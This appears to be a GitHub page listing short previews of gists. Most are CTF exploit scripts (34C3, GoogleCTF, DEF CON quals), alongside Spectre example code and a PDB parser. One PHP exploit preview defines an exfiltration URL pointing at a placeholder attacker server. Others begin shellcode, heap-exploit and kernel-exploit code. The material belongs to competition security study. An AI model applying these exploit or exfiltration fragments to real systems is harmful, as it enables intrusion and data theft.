Skip to content

Instantly share code, notes, and snippets.

View elnx's full-sized avatar
🖖
What's happening?

elnx

🖖
What's happening?
194 followers · 1.4k following
  • /dev/null
View GitHub Profile
@namazso
namazso / pdb_parser_lite.cpp
Created April 18, 2018 17:49
A lightweight PDB parser that retrieves type and symbol CodeView streams.
/* MIT License
*
* Copyright (c) namazso 2018
*
* Permission is hereby granted, free of charge, to any person obtaining a copy
* of this software and associated documentation files (the "Software"), to deal
* in the Software without restriction, including without limitation the rights
* to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
* copies of the Software, and to permit persons to whom the Software is
* furnished to do so, subject to the following conditions:
@ErikAugust
ErikAugust / spectre.c
Last active April 15, 2024 13:55
Spectre example code
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif
@eboda
eboda / doit
Last active June 13, 2018 06:10
34C3 CTF minbashmaxfun exploit
nc minbashmaxfun 1337 -v <<<$(python solve.py file dump_flag.sh )
@eboda
eboda / exploit.php
Last active December 29, 2017 22:52
34C3 CTF urlstorage exploit
<?php
$target = 'http://127.0.0.1/';
$exploit = 'http://yourserver:1337/exploit.php';
$exfil = 'http://yourserver:1337/FLAG=';
function enc($s) {
$res = '';
for ($i = 0; $i < strlen($s); $i++) {
$res .= '\\' . dechex(ord($s[$i]));
}
@itszn
itszn / exploit.html
Last active April 9, 2021 18:31
34c3ctf V9 Exploit
<script>
function gc() { for (let i = 0; i < 0x10; i++) { new ArrayBuffer(0x1000000); } }
var sc = [];
for (var i=0; i<0x480; i++) {
sc.push(0x90);
}
//sc.push(0xcc);
//sc.push(0xeb);
//sc.push(0xfe);
@peternguyen93
peternguyen93 / ghost_in_the_heap.py
Created November 8, 2017 14:42
#!/usr/bin/python
# Author : peternguyen
from Pwn import *
# p = Pwn(mode=1,port=8887)
p = Pwn(mode=1,host='52.193.196.17',port=56746)
def select(op):
p.read_until('Your choice: ')
@Jinmo
Jinmo / README.md
Created August 7, 2017 01:02
Working on it

Disassembler

Let's make disassembler, easier.

1. Template parser

Template with simplicity, let's keep it simple.

mov $reg, $reg
@saelo
saelo / pwn.py
Last active December 15, 2019 23:35
Solution for "assignment" of GoogleCTF 2017
#!/usr/bin/env python3
#
# Exploit for "assignment" of GoogleCTF 2017
#
# CTF-quality exploit...
#
# Slightly simplified and shortened explanation:
#
# The bug is a UAF of one or both values during add_assign() if a GC is
# triggered during allocate_value(). The exploit first abuses this to leak a
@syjcnss
syjcnss / exploit.c
Created June 5, 2017 08:20
exploit for cred_jar
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <pthread.h>
#define ALLOC_CTX _IO('t', 1)
@hellman
hellman / rsa_timing_attack_d_Montgomery.py
Created May 1, 2017 12:23
DEF CON 2017 Quals - Godzilla (Reverse/Crypto)
#-*- coding:utf-8 -*-
'''
DEF CON 2017 Quals - Godzilla (Reverse)
Timing attack on RSA decryption.
Based on http://www.cs.jhu.edu/~fabian/courses/CS600.624/Timing-full.pdf
Another solutions:
https://gist.github.com/nneonneo/367240ae2d8e705bb9173a49a7c8b0cd by b2xiao
https://gist.github.com/Riatre/caac24840b176cf843b3f66ad9a5eeaf by riatre